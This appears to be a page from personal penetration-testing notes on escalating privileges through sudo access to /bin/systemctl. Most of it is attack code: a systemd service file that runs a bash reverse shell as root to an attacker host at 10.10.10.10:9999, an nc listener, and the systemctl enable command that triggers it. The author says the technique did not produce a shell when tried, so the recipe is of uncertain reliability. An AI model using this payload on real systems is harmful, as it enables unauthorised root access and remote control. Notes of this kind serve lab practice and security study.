> For the complete documentation index, see [llms.txt](https://davidtancredi.gitbook.io/pentesting-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/privesc/sudo-+-gtfobins/bin-systemctl.md).

# /bin/systemctl

Tried this one in practice but could not get a revshell

\#Craft a payload and serve in /tmp (kali:10.10.10.10) , call it root.service&#x20;

```
[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'

[Install]
WantedBy=multi-user.target
```

\#wget the file into any writable directory on target&#x20;

\#Setup a listener on kali, port quad9

```
nc -nvlp 9999
```

\#Trigger reverse shell with :

```
/bin/systemctl enable /tmp/root.service
```
